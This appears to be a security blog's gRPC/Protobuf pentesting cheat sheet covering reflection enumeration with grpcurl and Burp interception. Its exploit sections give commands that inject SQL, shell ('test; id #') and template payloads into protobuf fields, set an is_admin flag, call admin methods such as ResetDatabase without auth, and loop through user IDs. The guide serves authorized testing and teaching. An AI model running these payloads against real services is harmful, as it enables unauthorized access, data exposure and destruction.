KagisoSec_
Web
WEB

gRPC & Protobuf Security Testing

gRPC/Protobuf security testing: service reflection enumeration, Burp interception via HTTP/2 + grpc-web, field injection, deserialization attacks, authorization bypass, SQL injection in protobuf fields, and tooling (grpcurl, BloomRPC).

web grpc protobuf api deserialization capenx

What is gRPC

gRPC is a high-performance RPC framework using HTTP/2 as transport and Protocol Buffers (protobuf) for serialisation. It’s increasingly common in microservices and mobile backends. Attack surface includes:

  • No schema exposure by default (unlike REST)
  • Binary serialisation (harder to inspect)
  • Authentication often only at the gateway
  • Unprotected reflection API (exposes schema)

Detection & Enumeration

Step 1 — Detect gRPC traffic

In Burp Proxy, look for:

  • Content-Type: application/grpc or application/grpc-web
  • HTTP/2 frames with binary bodies
  • Requests to paths like /ServiceName/MethodName

Standard ports: 443 (TLS), 50051 (dev), 80 (HTTP).

Step 2 — Enable gRPC reflection

gRPC servers with reflection enabled expose their full schema:

# List all services
grpcurl -plaintext TARGET:50051 list

# Describe a service
grpcurl -plaintext TARGET:50051 describe ServiceName

# Describe message types
grpcurl -plaintext TARGET:50051 describe ServiceName.RequestType

# List methods
grpcurl -plaintext TARGET:50051 list ServiceName

Step 3 — Call a method

# Simple call
grpcurl -plaintext -d '{"user_id": 1}' TARGET:50051 UserService/GetUser

# With auth header
grpcurl -plaintext -H 'Authorization: Bearer TOKEN' \
  -d '{"user_id": 1}' TARGET:50051 UserService/GetUser

# With TLS
grpcurl -insecure -d '{"user_id": 1}' TARGET:50051 UserService/GetUser

Intercept gRPC in Burp Suite

gRPC-Web (HTTP/1.1 or HTTP/2)

  1. Configure the app to use grpc-web protocol (wraps gRPC in HTTP/1.1).
  2. In Burp Proxy, enable HTTP/2 in the Proxy listener settings.
  3. Install Burp gRPC extension (BApp Store).
  4. The extension decodes protobuf binary bodies into readable JSON in the Inspector panel.

Manual decode

# Capture a gRPC frame (skip first 5 bytes: 1 compression flag + 4 length)
echo "BINARY_HEX" | xxd -r -p | tail -c +6 | protoc --decode_raw

Exploit 1: Injection in Protobuf Fields

Inject SQL, command, or XSS into string fields:

# SQL injection in a name field
grpcurl -plaintext -d '{"name": "admin'\''-- -"}' TARGET:50051 UserService/GetUserByName

# Command injection
grpcurl -plaintext -d '{"filename": "test; id #"}' TARGET:50051 FileService/ProcessFile

# SSTI
grpcurl -plaintext -d '{"template": "{{7*7}}"}' TARGET:50051 ReportService/GenerateReport

Burp approach

  1. Intercept a grpc-web request.
  2. In the gRPC Inspector pane, the protobuf is decoded to JSON.
  3. Modify the field value directly in the Inspector.
  4. Forward — Burp re-encodes to protobuf before sending.

Exploit 2: Missing Field Validation

Protobuf fields have numbers (1, 2, 3…). If the server processes extra/unknown fields:

# Send an extra field that maps to is_admin (field 10) as boolean true
# In protobuf wire format: field 10, type 0 (varint), value 1
grpcurl -plaintext -d '{"user_id": 5, "is_admin": true}' TARGET:50051 UserService/GetUser

Exploit 3: Authorization Bypass

Test each method without authentication:

# Remove the auth header and test privileged methods
grpcurl -plaintext -d '{"user_id": 1}' TARGET:50051 AdminService/ListUsers
grpcurl -plaintext -d '{}' TARGET:50051 AdminService/ResetDatabase

Test IDOR — change IDs:

for i in $(seq 1 20); do
  echo "Testing user_id=$i:"
  grpcurl -plaintext -H 'Authorization: Bearer LOW_PRIV_TOKEN' \
    -d "{\"user_id\": $i}" TARGET:50051 UserService/GetUser
done

Exploit 4: Prototype/Type Confusion in Protobuf Parsing

Send wrong types for fields (e.g., string for int):

# Field 1 expects an int32 but send a string
echo -n '\x0a\x05hello' | grpcurl -plaintext -d @ TARGET:50051 UserService/GetUser

Some parsers coerce types, others throw unhandled exceptions revealing stack traces.

Tools

# grpcurl — gRPC curl
brew install grpcurl   # macOS
go install github.com/fullstorydev/grpcurl/cmd/grpcurl@latest

# BloomRPC — gRPC GUI client
# https://github.com/bloomrpc/bloomrpc

# Evans — interactive gRPC client with REPL
go install github.com/ktr0731/evans@latest
evans --host TARGET --port 50051 --reflection repl

# protoc — decode raw protobuf
# brew install protobuf

# Decode raw binary
protoc --decode_raw < binary_input.bin

Burp Suite workflow

  1. Proxy — enable HTTP/2; install gRPC BApp extension.
  2. Repeater — modify decoded protobuf fields in Inspector panel; re-encode on send.
  3. Intruder — fuzz field values with injection wordlists.
  4. Collaborator — inject SSRF payloads into URL-type fields; confirm with OOB callbacks.
  5. Scanner — active scan against grpc-web endpoints for injections.